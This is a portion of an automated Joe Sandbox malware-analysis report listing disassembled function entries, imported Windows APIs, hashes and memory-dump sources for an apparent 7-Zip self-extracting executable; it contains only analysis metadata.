                                                                                                                                              • Opcode Fuzzy Hash: 8dbbb87c90dc95c51b739d07fbf2f3a0a59703ca1f4a3bec119e197961c230f4
                                                                                                                                              • Instruction Fuzzy Hash: 6C310A72604A4182EB22DB17F4503AAA7A1F7D8BD8F648116EB8D47775DF3CC9428B40
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$Window$Long$System$ClientHandleLoadMessageMetricsModuleScreenSendText$DirectoryFileFocusIconImageInfoParentRectShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1138730274-0
                                                                                                                                              • Opcode ID: 61d6c78218eb6317a45e8097d8a6f23d8aa33d7da5d49d6b5631f032446ee95d
                                                                                                                                              • Instruction ID: b63a148017210593d40ca0b968c861178b1ddd50ce58897d5ddd9e58bd0b325e
                                                                                                                                              • Opcode Fuzzy Hash: 61d6c78218eb6317a45e8097d8a6f23d8aa33d7da5d49d6b5631f032446ee95d
                                                                                                                                              • Instruction Fuzzy Hash: BB216A72700A8192EB11DB62F9443DAB361FBD8BC1F504025BF4A43BA5CF3CC9558740
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentHookThreadWindows$??3@DialogItemTextWindowwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3524378390-0
                                                                                                                                              • Opcode ID: 96ff3a8907448ea7e7d5942ad81f8ab8657560436fa996fd6de5ea723de8fd05
                                                                                                                                              • Instruction ID: e637697b717b4d7adabf1c77aa28ec68b3cb111fe366be0d3bba24708754debd
                                                                                                                                              • Opcode Fuzzy Hash: 96ff3a8907448ea7e7d5942ad81f8ab8657560436fa996fd6de5ea723de8fd05
                                                                                                                                              • Instruction Fuzzy Hash: 75113071100A05C2EB12EF67F954BD473A1F76CBD4F105029EB1A07A75EF388894C741
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                              • Opcode ID: 68134717db233abe0fcbf376e0d6bb68a5f352f7fd12f8c9e61c4e0d7b0c0c4c
                                                                                                                                              • Instruction ID: 999c3428c13105c206d04047104b56539774967d394dcdc4b45c643832896048
                                                                                                                                              • Opcode Fuzzy Hash: 68134717db233abe0fcbf376e0d6bb68a5f352f7fd12f8c9e61c4e0d7b0c0c4c
                                                                                                                                              • Instruction Fuzzy Hash: F4018C31225A4486EB828F22E8907D66360F79DBD0F446628FF5E47BB4DB3CCD958300
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@Item$TextWindow$Focus
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1467601455-0
                                                                                                                                              • Opcode ID: 23821594c8596c64eef42eef01d5d5f5d0b89be1efe43f4416cf6e3c56d12a5a
                                                                                                                                              • Instruction ID: ee40ff9b4ba704ae558b6c641d0b54c204ed98ad317550b1a5b894c6021ab693
                                                                                                                                              • Opcode Fuzzy Hash: 23821594c8596c64eef42eef01d5d5f5d0b89be1efe43f4416cf6e3c56d12a5a
                                                                                                                                              • Instruction Fuzzy Hash: 7601AF35605B9182EA15AB93F8543AA7361F7DCBD5F188029AF4E53B69DE3CD8828700
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
                                                                                                                                                • Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8
                                                                                                                                                • Part of subcall function 0000000140002B70: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B8D
                                                                                                                                                • Part of subcall function 0000000140002B70: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140002BBF
                                                                                                                                                • Part of subcall function 0000000140003274: MultiByteToWideChar.KERNEL32 ref: 00000001400032D9
                                                                                                                                              • ??3@YAXPEAX@Z.MSVCRT ref: 00000001400038E1
                                                                                                                                              • ??3@YAXPEAX@Z.MSVCRT ref: 0000000140003900
                                                                                                                                              • ??3@YAXPEAX@Z.MSVCRT ref: 0000000140003908
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@$ByteCharMultiWide
                                                                                                                                              • String ID: X
                                                                                                                                              • API String ID: 319580807-3081909835
                                                                                                                                              • Opcode ID: 37d8b73d4cda694d815cc8fa86ab5e5041d77350a8a1c6e6df36e47c89b5f452
                                                                                                                                              • Instruction ID: e3a11a9e6badfdd8c8a079c73f7c2ff90b4b6c6a3d601e721762b9fc762a96e7
                                                                                                                                              • Opcode Fuzzy Hash: 37d8b73d4cda694d815cc8fa86ab5e5041d77350a8a1c6e6df36e47c89b5f452
                                                                                                                                              • Instruction Fuzzy Hash: EC51A1B2614A8086DB62DF12E0417DEB7A9F78CBC4F508012FB8D577AADB78C951CB00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$BrowseFocusFolderFromListMallocPathTextWindowmemset
                                                                                                                                              • String ID: A
                                                                                                                                              • API String ID: 1716548450-3554254475
                                                                                                                                              • Opcode ID: 5a52c8061c88f56462f6c6f8983384dcaa706acc257a5b6df1d51f411b7befa7
                                                                                                                                              • Instruction ID: 46c1a9cfd4450baac315782f80919ef9387bd64b916b3923527e6b59a0aa13df
                                                                                                                                              • Opcode Fuzzy Hash: 5a52c8061c88f56462f6c6f8983384dcaa706acc257a5b6df1d51f411b7befa7
                                                                                                                                              • Instruction Fuzzy Hash: E7111976209A8582EE61DB17F4843EAA3A1F788BC4F444125EB5D47A65DF7CC948CB00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 359084233-0
                                                                                                                                              • Opcode ID: 3622bbda2e08b7e38e83877aa52f7fa3d612acbb02162747846d26085ce9d720
                                                                                                                                              • Instruction ID: 09920a941ca1f851a91bc0334998cfe95e93caa460d85b4cc9561f19959564ec
                                                                                                                                              • Opcode Fuzzy Hash: 3622bbda2e08b7e38e83877aa52f7fa3d612acbb02162747846d26085ce9d720
                                                                                                                                              • Instruction Fuzzy Hash: 16413BB561460086FB2ADB57F4557E923A1F78CBD0F248129FB5947AF4CF39CA458700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PathTemp$??2@??3@AttributesFilewsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 51045435-0
                                                                                                                                              • Opcode ID: 7f09be7bd5712a3bcaae1353d953167a8e73bde6af57453d2c4b80cf29d335a7
                                                                                                                                              • Instruction ID: 191b355840b50b170f5699fe2469ea46b17b6c964ac9f155fbda5178bc08f6cc
                                                                                                                                              • Opcode Fuzzy Hash: 7f09be7bd5712a3bcaae1353d953167a8e73bde6af57453d2c4b80cf29d335a7
                                                                                                                                              • Instruction Fuzzy Hash: B0319DB3610A4086EB16EF26E4543AE73A1F799FD5F19C026EB0A473A5CB39C881C740
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$MetricsSystem$ClientLongRectWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2818034528-0
                                                                                                                                              • Opcode ID: 1687090e4f1e792b97675591ad16dbb24b8f61bfac3ee79ef8c238123b8a3f6f
                                                                                                                                              • Instruction ID: df6919512447fbe9cd5466cb71f750e2e906a2b5aef89cc43ce7c2ace63f2122
                                                                                                                                              • Opcode Fuzzy Hash: 1687090e4f1e792b97675591ad16dbb24b8f61bfac3ee79ef8c238123b8a3f6f
                                                                                                                                              • Instruction Fuzzy Hash: 0E21577260464187E711DB26F44478ABBA0F3CAB98F244219FB9807BA9CB3DD845CB44
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3015594791-0
                                                                                                                                              • Opcode ID: 480dc8bd860381275dbcb2b3cfb9e20d3c829652098b5aefab881d1f6bee3b3b
                                                                                                                                              • Instruction ID: afe980f8de0024294af7d57e3704c6222ac748531bb088123d1fc463b031e5b3
                                                                                                                                              • Opcode Fuzzy Hash: 480dc8bd860381275dbcb2b3cfb9e20d3c829652098b5aefab881d1f6bee3b3b
                                                                                                                                              • Instruction Fuzzy Hash: 9111E675204A41C2FA16DB17E894BA963A0B79CBC4F64442AFB4E87674DF38CD86C700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2001801573-0
                                                                                                                                              • Opcode ID: 2c1841ae52db38bdad9c0936b3bcf2ff07c87b937ffcfed794aed539c46852f5
                                                                                                                                              • Instruction ID: 77b3ed98445d90585e203104df3b1ae813a919a0c71941f792ac75a72c1fd89d
                                                                                                                                              • Opcode Fuzzy Hash: 2c1841ae52db38bdad9c0936b3bcf2ff07c87b937ffcfed794aed539c46852f5
                                                                                                                                              • Instruction Fuzzy Hash: C0016932200A8486EB628B52F5447D963A0FB8DBC8F188129EF8D036A4DF3CC949C700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@TextWindow$Item$Length
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4031798017-0
                                                                                                                                              • Opcode ID: f12ac23c49f599083fb9d36d2e0e5cf0a38250fc0eff98ecaf5b30fb5ae219b2
                                                                                                                                              • Instruction ID: 5d6496181261462c0915d4228469efdb76b185da26c00bf3824badf1e2e3f054
                                                                                                                                              • Opcode Fuzzy Hash: f12ac23c49f599083fb9d36d2e0e5cf0a38250fc0eff98ecaf5b30fb5ae219b2
                                                                                                                                              • Instruction Fuzzy Hash: 11F0FE35704B8182EA45AB93F84439A6360F7DDFD5F189429AF5E47725DE38C8518700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 635176117-0
                                                                                                                                              • Opcode ID: 28fc8308dde2d3ee48792d6cbfcb0da7ed1c68f0bc4a1da2d127f15d21928489
                                                                                                                                              • Instruction ID: 6e8ef865eba8d5354af7c652a7ad179180ace349713e99db124c79653ff336b7
                                                                                                                                              • Opcode Fuzzy Hash: 28fc8308dde2d3ee48792d6cbfcb0da7ed1c68f0bc4a1da2d127f15d21928489
                                                                                                                                              • Instruction Fuzzy Hash: 57F0EDB060460692FB669BB768483F922A29BEDBD5F980534F766875F0EF388D854240
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientScreen$ParentRectWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099118873-0
                                                                                                                                              • Opcode ID: 55a43b4053019dea46f0684e0c4e1872998a85566e050c804256634632fe0d49
                                                                                                                                              • Instruction ID: eec8631daeff4a8b40e03ae8334af5c7b4b288ff28bb09228d502775c28c9567
                                                                                                                                              • Opcode Fuzzy Hash: 55a43b4053019dea46f0684e0c4e1872998a85566e050c804256634632fe0d49
                                                                                                                                              • Instruction Fuzzy Hash: 16F01C31714B91C2EA158B93B844399A361EBDDFC0F089065EF4B47B68DE3CC8968700
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$??3@wsprintf
                                                                                                                                              • String ID: %X - %03X - %03X - %03X - %03X
                                                                                                                                              • API String ID: 1174869416-1993364030
                                                                                                                                              • Opcode ID: 01b2a11208a023f90a599f1703953f6435cbef190b9e12f3ba11b393b00809df
                                                                                                                                              • Instruction ID: ffd680598031eff7428291d90b40d6fd7eb1d39fdf9b6260418624d11b2a51cb
                                                                                                                                              • Opcode Fuzzy Hash: 01b2a11208a023f90a599f1703953f6435cbef190b9e12f3ba11b393b00809df
                                                                                                                                              • Instruction Fuzzy Hash: 63311CB2604A8192EB12EF52F4813DA6361F7983C4F90401AFB4D576BADF7DC949CB10
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientItemScreenWindow$ParentRect
                                                                                                                                              • String ID: $
                                                                                                                                              • API String ID: 2675214473-227171996
                                                                                                                                              • Opcode ID: 51f079e4d4f4fcc71bf2904cbd48d06344dddafd7faa8d6738712749788bde5f
                                                                                                                                              • Instruction ID: a894e37796efc521092dfa17ded35d1c22eb5227e5060540a828780cb5199e9f
                                                                                                                                              • Opcode Fuzzy Hash: 51f079e4d4f4fcc71bf2904cbd48d06344dddafd7faa8d6738712749788bde5f
                                                                                                                                              • Instruction Fuzzy Hash: 97116D72224A4587C714CF2AF44479ABBA1F3D9B98F648215FB8947B68CB3DD845CB40
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __set_app_type__setusermatherr
                                                                                                                                              • String ID: MZ`
                                                                                                                                              • API String ID: 2629043507-2330268423
                                                                                                                                              • Opcode ID: de51e5fa6a5e01599c3b7a90381da6932179d8692d1a97bd94d68b8f77d4d8dc
                                                                                                                                              • Instruction ID: d474ff2474bbd5d39d74a2b21028d853ddfa101fb484800192a33e05758a9e4a
                                                                                                                                              • Opcode Fuzzy Hash: de51e5fa6a5e01599c3b7a90381da6932179d8692d1a97bd94d68b8f77d4d8dc
                                                                                                                                              • Instruction Fuzzy Hash: DA21FE74A01601D6EB62DB66E8883F832E0B74D7A5F104925F7198B1F1DB3E8885D700
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast_wtol
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3876490843-3916222277
                                                                                                                                              • Opcode ID: 33be8e3848a09fd9500c59ae6585812a037844551d2fa08a20a7f881c3d6e97d
                                                                                                                                              • Instruction ID: ea90c0da60f31b2d8a83e238c5a0069b670d9b42edf899a33ef11bff61e78868
                                                                                                                                              • Opcode Fuzzy Hash: 33be8e3848a09fd9500c59ae6585812a037844551d2fa08a20a7f881c3d6e97d
                                                                                                                                              • Instruction Fuzzy Hash: 78F0FFF2E1110185FB77AB777811BEA11E0D769BC5F584411FB1A834F2E67C48824251
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message
                                                                                                                                              • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                              • API String ID: 2030045667-3806377612
